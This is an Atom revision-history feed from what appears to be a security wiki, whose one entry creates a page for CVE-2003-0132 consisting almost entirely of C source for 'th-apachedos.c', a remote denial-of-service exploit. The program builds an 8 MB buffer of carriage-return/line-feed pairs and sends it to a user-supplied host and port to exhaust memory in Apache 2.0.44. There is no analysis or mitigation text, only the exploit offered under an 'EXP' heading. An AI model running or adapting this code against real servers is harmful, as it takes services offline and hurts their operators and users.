<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2003-0132_Apache_2.0.44_%28Linux%29_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2003-0132 Apache 2.0.44 (Linux) 拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2003-0132_Apache_2.0.44_%28Linux%29_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2003-0132_Apache_2.0.44_(Linux)_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-07T23:57:41Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2003-0132_Apache_2.0.44_(Linux)_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=2058&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; /******** th-apachedos.c ******************************************************** * * * Remote Apache DoS exploit * * ------------------------- * * Written as a...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2003-0132_Apache_2.0.44_(Linux)_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=2058&amp;oldid=prev"/>
		<updated>2021-05-03T12:23:59Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; /******** th-apachedos.c ******************************************************** * * * Remote Apache DoS exploit * * ------------------------- * * Written as a...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/******** th-apachedos.c ********************************************************&lt;br /&gt;
* *&lt;br /&gt;
* Remote Apache DoS exploit *&lt;br /&gt;
* ------------------------- *&lt;br /&gt;
* Written as a poc for the: *&lt;br /&gt;
* &lt;br /&gt;
* This program sends 8000000 \n's to exploit the Apache memory leak. *&lt;br /&gt;
* Works from scratch under Linux, as opposed to apache-massacre.c . *&lt;br /&gt;
* &lt;br /&gt;
* &lt;br /&gt;
* Daniel Nyström &amp;lt;exce@netwinder.nu&amp;gt; *&lt;br /&gt;
* &lt;br /&gt;
* - www.telhack.tk - *&lt;br /&gt;
* &lt;br /&gt;
******************************************************** th-apachedos.c ********/&lt;br /&gt;
&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
#include &amp;lt;errno.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/types.h&amp;gt;&lt;br /&gt;
#include &amp;lt;netinet/in.h&amp;gt;&lt;br /&gt;
#include &amp;lt;netdb.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/socket.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char *argv[])&lt;br /&gt;
{&lt;br /&gt;
int sockfd;&lt;br /&gt;
int count;&lt;br /&gt;
char buffer[8000000];&lt;br /&gt;
struct sockaddr_in target;&lt;br /&gt;
struct hostent *he;&lt;br /&gt;
&lt;br /&gt;
if (argc != 3)&lt;br /&gt;
{&lt;br /&gt;
fprintf(stderr, &amp;quot;\nTH-apachedos.c - Apache &amp;lt;= 2.0.44 DoS exploit.&amp;quot;);&lt;br /&gt;
fprintf(stderr, &amp;quot;\n----------------------------------------------&amp;quot;);&lt;br /&gt;
fprintf(stderr, &amp;quot;\nUsage: %s &amp;lt;Target&amp;gt; &amp;lt;Port&amp;gt;\n\n&amp;quot;, argv[0]);&lt;br /&gt;
exit(-1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
printf(&amp;quot;\nTH-Apache DoS\n&amp;quot;);&lt;br /&gt;
printf(&amp;quot;-------------\n&amp;quot;);&lt;br /&gt;
printf(&amp;quot;-&amp;gt; Starting...\n&amp;quot;); &lt;br /&gt;
printf(&amp;quot;-&amp;gt;\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
// memset(buffer, '\n', sizeof(buffer)); /* testing */&lt;br /&gt;
&lt;br /&gt;
for (count = 0; count &amp;lt; 8000000;) &lt;br /&gt;
{&lt;br /&gt;
buffer[count] = '\r'; /* 0x0D */&lt;br /&gt;
count++;&lt;br /&gt;
buffer[count] = '\n'; /* 0x0A */&lt;br /&gt;
count++;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
if ((he=gethostbyname(argv[1])) == NULL)&lt;br /&gt;
{&lt;br /&gt;
herror(&amp;quot;gethostbyname() failed &amp;quot;);&lt;br /&gt;
exit(-1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
memset(&amp;amp;target, 0, sizeof(target));&lt;br /&gt;
target.sin_family = AF_INET;&lt;br /&gt;
target.sin_port = htons(atoi(argv[2]));&lt;br /&gt;
target.sin_addr = *((struct in_addr *)he-&amp;gt;h_addr);&lt;br /&gt;
&lt;br /&gt;
printf(&amp;quot;-&amp;gt; Connecting to %s:%d...\n&amp;quot;, inet_ntoa(target.sin_addr), atoi(argv[2]));&lt;br /&gt;
printf(&amp;quot;-&amp;gt;\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) &amp;lt; 0)&lt;br /&gt;
{&lt;br /&gt;
perror(&amp;quot;socket() failed &amp;quot;);&lt;br /&gt;
exit(-1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
if (connect(sockfd, (struct sockaddr *)&amp;amp;target, sizeof(struct sockaddr)) &amp;lt; 0)&lt;br /&gt;
{&lt;br /&gt;
perror(&amp;quot;connect() failed &amp;quot;);&lt;br /&gt;
exit(-1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
printf(&amp;quot;-&amp;gt; Connected to %s:%d... Sending linefeeds...\n&amp;quot;, inet_ntoa(target.sin_addr),&lt;br /&gt;
atoi(argv[2]));&lt;br /&gt;
printf(&amp;quot;-&amp;gt;\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))&lt;br /&gt;
{&lt;br /&gt;
perror(&amp;quot;send() failed &amp;quot;);&lt;br /&gt;
exit(-1);&lt;br /&gt;
close(sockfd);&lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
close(sockfd);&lt;br /&gt;
&lt;br /&gt;
printf(&amp;quot;-&amp;gt; Finished smoothly, check hosts apache...\n\n&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// milw0rm.com [2003-04-11]&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>